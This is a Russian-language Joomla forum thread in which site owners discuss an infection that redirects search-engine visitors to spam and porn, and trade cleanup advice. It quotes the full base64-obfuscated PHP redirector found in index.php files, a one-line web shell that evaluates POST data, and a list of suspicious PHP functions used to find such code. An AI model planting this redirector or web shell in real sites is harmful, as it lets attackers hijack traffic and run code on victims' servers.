Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 34 Ответов
  • 5428 Просмотров
*

Parusnik55

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Всем привет! У меня проблема, не могу пройти на свой сайт ( http://kalendarsadovoda.ru/ ) через поисковик.  Когда добавляю его адрес в поисковую строку Google или какого нибудь другого поисковика) то мне выпадает вот такие результаты:  http://www.google.ru/search?sclient=psy-ab&hl=ru&newwindow=1&client=firefox&hs=HFR&rls=org.mozilla:ru%3Aofficial&source=hp&q=kalendarsadovoda.ru&pbx=1&oq=kalendarsadovoda.ru&aq=f&aqi=&aql=&gs_sm=s&gs_upl=0l0l0l5917691l0l0l0l0l0l0l0l0ll0l0&biw=1440&bih=693&cad=cbv&sei=T2AET4GMMYTUsgaxyYz3Dw  

Перехожу по ссылкам на свой сайт но туда не попадаю а попадаю на какую нибудь рекламу или еще хуже порносайт. Подскажите от чего такое может быть? Почему поисковики отражают такие нехорошие ссылки? Заранее спасибо.
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Это вирус. Буквально позавчера уже обращались с такой проблемой - как оказалось вирус заразил ~3000 файлов сайта.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

Parusnik55

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Не знаю как это могло случится, но во всех файлах index.php я нашел вот такой длинный код: eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLjM0NS5wbC8iKTsNCmV4aXQoKTsNCn0NCn0NCn0NCn0="));

Пришлось полностью удалять сайт и закачивать новый дистрибутив. Подскажите пожалуйста каким образом злоумышленники могли прописать этот код? И какие меры можно предпринять против них?
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Зря конечно удалили, нужно было лечить. Скорее всего у вас завелся троян, который угнал кому надо пароли от фтп.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
По ходу не то что бы троян... второй случай за последние пару дней.
Меня интересует версия Joomla, которая стояла.
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

Parusnik55

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
Зря конечно удалили, нужно было лечить. Скорее всего у вас завелся троян, который угнал кому надо пароли от фтп.

Спасибо. А не подскажете как можно вылечить уже зараженный сайт? Есть еще какиенибудь способы кроме как востановить из бэкапа?
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Да - удалить вредоносный код.
Вы не могли бы указать точную версию Joomla и сторонние расширения, установленные на сайте? Это могло бы очень помочь.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

Parusnik55

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
По ходу не то что бы троян... второй случай за последние пару дней.
Меня интересует версия Joomla, которая стояла.
Да разные версии Joomla были и 1,5 и 1,7. Три сайта так накрыло.
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
А точнее? Какие версии движка использовались?
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

wishlight

  • Гуру
  • 5074
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
5 уже... меня кстати не перекидывает. Вылечили значит.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
А вот очень интересно путь к базе данных у всех зараженных  localhost или же разные ?
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
А вот очень интересно путь к базе данных у всех зараженных  localhost или же разные ?
Путь разный. В моем случае это был не locahost
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
А вот очень интересно путь к базе данных у всех зараженных  localhost или же разные ?
А это то тут причем?
*

voland

  • Легенда
  • 11026
  • 588 / 112
  • Эта строка съедает место на вашем мониторе
Путь разный. В моем случае это был не locahost
Тоже случай? И что показало расследование?
*

Aleks_El_Dia

  • Живу я здесь
  • 3671
  • 353 / 0
  • AEDStudio Joomla! Direction
Тоже случай? И что показало расследование?
В том то и дело что расследования небыло. Случай произошел в разгар праздников и было не до того. Да и не думал что это станет таким массовым явлением - грешил на нечистоплотность ПК клиента.
Спам придумали боги в отместку за наши молитвы (с) Рома Воронежский
На молоко: Z369038872422 || R210017695494 || U247040729215 || ЯД 410011288250383
Мигрирую сайты, переношу расширения J!1.0->J!1.5->J!2.5. Более 50 успешных миграций.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
А это то тут причем?
По моему ответ в вопросе
*

NightGuard

  • Живу я здесь
  • 2927
  • 378 / 7
  • вжжж-вжжж
По моему ответ в вопросе
Путь к БД не важен по умолчанию, интересны версии компонентов и что использовалось, а главное - где бралось.
Идеология сверхпотребления более опасна для человечества, чем идеология гитлеровского тоталитаризма
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
Народ. Вот мой сайт http://akvarim.ru. Такая же проблема. Сам дистрибудив брал на joomlaportal. Установлен JoomShopping, ultimatecontent, jcomments, aiContactSafe, Simple Image Gallery PRO Plugin v2.0
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Народ. Вот мой сайт http://akvarim.ru. Такая же проблема. Сам дистрибудив брал на joomlaportal. Установлен JoomShopping, ultimatecontent, jcomments, aiContactSafe, Simple Image Gallery PRO Plugin v2.0
Ну и тебе закинули (или сам притащил) редирект на osa.pl
вот читай, ищи и удаляй
Цитировать
eval, base64_decode, gzuncompress, gzinflate, ob_start, str_rot13 с абракадаброй тоже весьма привлекают внимание, как и вариации на тему file, fopen, readfile, file_get_contents, HttpRequest::send с чужими адресами.
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
Есть у кого толковый способ по Joomla как удалить эту гадость. Перезапускать сайт - это слишком. А сам не знаю что и где конкретно искать...
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Размести в индексных файлах комментарий с просьбой оставлять инструкцию по удалению )))

Воспользуйся поиском по форуму типа base64_decode


*

polozatka

  • Новичок
  • 1
  • 0 / 0
у меня такой вирус появляется раз в неделю. Я всегда заменяю зараженные файлы на нормальные.
Если я почищу комп от вирусов, и сменю пароли на сайте и сервере, это поможет надолго избавиться?

А имеет смысл удалять все вирусы с моего компа или нет? и какой антивирус посоветуете?
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
у меня такой вирус появляется раз в неделю. Я всегда заменяю зараженные файлы на нормальные.
Если я почищу комп от вирусов, и сменю пароли на сайте и сервере, это поможет надолго избавиться?
Походу вы еще не проснулись.
От этого можно избавиться если усилить безопасность сайта с помощью php.ini, htaccess, т.д. и т.п
Цитировать
А имеет смысл удалять все вирусы с моего компа или нет?
Это как минимум не одыкват
Цитировать
и какой антивирус посоветуете?
Лицензионный

Вредоносный редиректор на osa.pl
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
Собственно ищу способ искоренить эту срань. Проблема такая - когда ставлю Joomla, она сама задает себе какие-то странные права. С ФТП клиента удалить/заменить файл нереально. Хостер тупит. Пользуюсь скриптами типа webadmin, но там файлы пакетно не заменишь.
Вернусь к проблеме. Скачав с хостинг-панели бэкап и распаковав его, тотал коммандером нашел около 500 зараженных файлов. Вроде бы все просто, осталось всего ничего - пакетно заменить эти строки тупо на пробел и залить обратно через хостинг панель. Но не нашел той "заменялки", чтоб указав директорию она тупо прошерстрила все файлики. Мож кто посоветует достойный софт?
Дальше... Пусть файлики мы вылечили. Как упаковать все это дело в архив бэкапа обратно? Нужен упаковщик .gz или .tar. А может вообще сойдет обычный ZIP не пробовал еще...

Ну а вообще. Так как сам не программист, обращаюсь иммено к ним (программистам). Если же какая-то гнида смогла такую хрень замутить, то почему не найдется тот ГЕРОЙ который сделает все так же, но наоборот. Я имею ввиду какой-нибудь скриптик или шелл который автоматом найдет все испорченные файлы и заменит текст на пробельчик. Думаю это реально. Тогда будет тому честь и хвала!
*

digital

  • Осваиваюсь на форуме
  • 45
  • 2 / 0
Хостер тупит.
А в чем именно это выражается?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Мож кто посоветует достойный софт?
http://joomlaforum.ru/index.php/topic,198048
Цитировать
просто, осталось всего ничего - пакетно заменить эти строки тупо на пробел и залить обратно через хостинг панель
и через час опять все будет на своем месте  :laugh:
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Цитировать
Я имею ввиду ..........заменит текст на пробельчик
Короче это можно сделать на стороне xocтинга с помощью SSH примерно так

и найди файлик с таким содержанием
Код
<?php eval(base64_decode($_POST["php"])); ?>


*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
А в чем именно это выражается?

Говорит-юзайте скрипты. Ничем не помогу.
*

wayn

  • Захожу иногда
  • 72
  • 0 / 0
http://joomlaforum.ru/index.php/topic,198048и через час опять все будет на своем месте  :laugh:

Лучше уж чем очко на весь экран с выдачи яндекса. Латать дыры уже отдельная тема.
*

oriol

  • Завсегдатай
  • 1042
  • 100 / 4
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2496
Последний ответ 14.02.2024, 13:15:59
от wishlight
Непонятные ссылки в индексе Яндекс

Автор Forgiving

Ответов: 16
Просмотров: 1484
Последний ответ 13.09.2021, 14:17:20
от ForQue
Вирус на сайте, генерирующий ссылки на магазин.

Автор chernykh

Ответов: 15
Просмотров: 1885
Последний ответ 23.04.2018, 21:58:08
от ProtectYourSite
Ссылки типа ?page=Igri-onlajn-na-dengi-avtomati-vulkan

Автор orkl

Ответов: 4
Просмотров: 1382
Последний ответ 13.04.2017, 20:54:51
от ProtectYourSite
Левые ссылки на сайте. Как бороться?!

Автор k.upak

Ответов: 28
Просмотров: 1819
Последний ответ 20.02.2017, 20:18:44
от flyingspook